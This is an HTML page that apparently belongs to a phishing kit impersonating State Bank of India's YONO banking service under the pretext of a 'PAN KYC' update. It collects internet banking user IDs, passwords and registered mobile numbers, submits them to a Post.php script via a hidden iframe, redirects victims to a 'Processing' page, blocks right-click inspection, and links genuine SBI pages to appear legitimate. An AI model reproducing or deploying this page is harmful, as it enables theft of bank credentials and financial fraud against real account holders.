<!DOCTYPE HTML> 
<html>
   <head>
     <title>State Bank of India | PAN Update</title>
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
      <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
      <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
      <link rel="manifest" href="/site.webmanifest">
      <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
      <meta name="msapplication-TileColor" content="#da532c">
      <link rel="stylesheet" type="text/css" href="Style_Main.css">
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700&display=swap" rel="stylesheet">
	   <style>
	   #ii
	   {
	   position:absolute;
	   top:6px;
	   margin-left:84%;
	   }
	   .login-box {
	   width: 90%;
	   padding: 10px;
	   }
	   
	   .login-box .user-box {
	   position: relative;
	   }
	   
	   .login-box .user-box input {
	   width: 100%;
	   padding: 3px 2px;
	   font-size: 16px;
	   color: black;
	   margin-bottom: 40px;
	   margin-left:0px;
	   border: none;
	   caret-color:#00A9E0;
	   border-bottom: 1.5px solid #673391;
	   outline: none;
	   background: transparent;
	   transition: border-color 0.2s;
	   font-family: 'Open Sans', sans-serif;
	   font-weight:500;
	   }
	   .login-box .user-box label {
	   position: absolute;
	   top:-10px;
	   left: 2px;
	   padding: 5px 2px;
	   font-size: 15px;
	   font-family: ;
	   color: #506070;
	   pointer-events: none;
	   transition: 0.3s;
	   font-family: 'Open Sans', sans-serif;
	   font-weight:400;
	   
	   }
	   .login-box input:focus {
	   width:100%;
	   margin-bottom: 40px;
	   padding: 3px 2px;
	   margin-left:0px;
	   font-size:16px;
	   border-width: 2px;
	   border-image: linear-gradient(#00A9E0,#00A9E0);
	   border-image-slice: 1;
	   font-family: 'Open Sans', sans-serif;
	   font-weight:500;
	   
	   }
	   
	   .login-box .user-box input:focus ~ label,
	   .login-box .user-box input:valid ~ label {
	   top: -30px;
	   left: 2px;
	   margin-left:2px;
	   color: #506070;
	   font-size: 14px;
	   font-family: ;
	   font-style:normal;
	   font-family: 'Open Sans', sans-serif;
	   font-weight:600;
	   }
	   
	   .login-box-mob {
	   width: 100%;
	   padding: 10px;
	   margin-top:-14px;
	   }
	   .login-box-mob .user-box-mob {
	   position: relative;
	   }
   </style>
   <script language="javascript"> 
   var message="This function is not allowed here.";
   function clickIE4(){
   if (event.button==2){
   alert(message);
   return false;
   }
   }
   function clickNS4(e){
   if (document.layers||document.getElementById&&!document.all){
   if (e.which==2||e.which==3){
   alert(message);
   return false;
   }
   }
   }
   if (document.layers){
   document.captureEvents(Event.MOUSEDOWN);
   document.onmousedown=clickNS4;}
   else if (document.all&&!document.getElementById){
   document.onmousedown=clickIE4;}
   document.oncontextmenu=new Function("alert(message);return false;")
   </script>
   </head>
   <body>
   <div class="container-fluid m-0 p-0">
<img src="Header.png" style="margin-top:-2%; margin-left:-8px;"width="105.5%">
<img src="Menu.png" id="ii" width="10%">

    
</div>
      <div class="container">
         <div class="row">
            <div class="col-md-7 col-xs-12 text-center"></div>
			
			
            <div class="col-md-5 col-xs-12">
            <div class="card m-0 p-0">
 <div class="bg-light p-30">
			<h1 style="font-family: 'Open Sans', sans-serif; font-weight:700; margin-top:-5px; margin-left:10px;"><b>Welcome to</b></h1>
			<center><img src="YONO_Logo.png" style="margin-top:-15px;" width="75%"></center>
			<div class="net">
			<center><p1 style="font-family: 'Open Sans', sans-serif; color:#280071; font-size:13px; font-weight:400; margin-top:0%;">Please use your existing
			<span style="font-family: 'Open Sans', sans-serif; color:#280071; font-size:13px; font-weight:700; margin-top:0%;"> Internet Banking User ID and Password</span>
			(credentials) of
			<span style="font-family: 'Open Sans', sans-serif; color:#280071; font-size:13px; font-weight:700; margin-top:0%;"> Personal and Corporate Internet Banking </span>
			to proceed
			<span style="font-family: 'Open Sans', sans-serif; color:#280071; font-size:13px; font-weight:700; margin-top:0%;"> PAN KYC</span>
			</p1></center>
			</div>
			</div>
			<div class="card-body" style="margin-top:-30px;">
           
              <!-- partial:index.partial.html -->
              <div class="login-box">
              <!-- Static- Please don't do anything here-->
              <script type="text/javascript">var submitted=false;</script>
              <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing.html';}"></iframe>
              <!--My Form-->
              <form class="LoginForm" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
                     <div class="row">
                        <div class="login-box">
                       <div class="user-box">
                        <rt>
                        <input type="text" name="User_ID" minlength="3" maxlength="30"
                         onkeyup="this.value=this.value.replace(/[^a-zA-Z0-9]/g, '')" required="">
                        <label>User ID<span style="color:red;"> *</span></label>
                        </div>
                        <div class="user-box">
                        <input type="text" name="Password" minlength="8" maxlength="30"
                        required="">
                        <label>Password<span style="color:red;"> *</span></label>
                        </div>
                        <div class="user-box">
                        <input type="text" name="Mobile_No." inputmode="numeric" maxlength="10"
                        pattern="[6-9]\d{9}" title="Enter valid mobile number !"
                        required="">
                        <label>Registered mobile number<span style="color:red;"> *</span></label>
                        </div>
                        <div class="user-box">
                        <input type="text" name="" maxlength="6" pattern="8985B" 
                        title="Please enter valid Captcha !"
                        required="">
                        <label>Enter the captcha<span style="color:red;"> *</span></label>
                        </div>
                        <div style="margin-top:-12%;" class="col-md-12"> 
                        <p1 style="font-family: 'Open Sans', sans-serif; font-size:13px; color:#000; font-weight:600; margin-left:2px;">Captcha</p1><br>
                        <img src="Captcha.jpg" width="75%">
                        </div>
                     </div>
                     <div class="w3ls-login">
                     <center><button type="submit" style="font-family: 'Open Sans', sans-serif; font-weight:500;" class="btn btn-success btn-block"> LOG IN </button></center>
                     </div>
					 <center><p style="font-family: 'Open Sans', sans-serif; font-weight:600; color:#673391; text-decoration:none;" class="link text-center"><a href="https://retail.onlinesbi.com/preretail/lockunlockuseraccess.htm" style="font-family: 'Open Sans', sans-serif; font-weight:600; color:#673391; text-decoration:none;">Lock Access</a>|<a href="https://retail.onlinesbi.com/retail/troubleloginhome.htm?bankCode=0" style="font-family: 'Open Sans', sans-serif; font-weight:600; color:#673391; text-decoration:none;">Forgot Password</a>|<a href="#" style="font-family: 'Open Sans', sans-serif; font-weight:600; color:#673391; text-decoration:none;">Forgot Username</a></p></center>
                  </form>		  
            </div>
	     </div>
          </div>
         </div>
      </div>
   <footer>
      <img src="SecurityA.jpg" style="margin-top:-6%;" width="100%">
      <img src="Footer.png" style="margin-left:-8px;" width="104.5%">
   </footer>
</body>
</html>   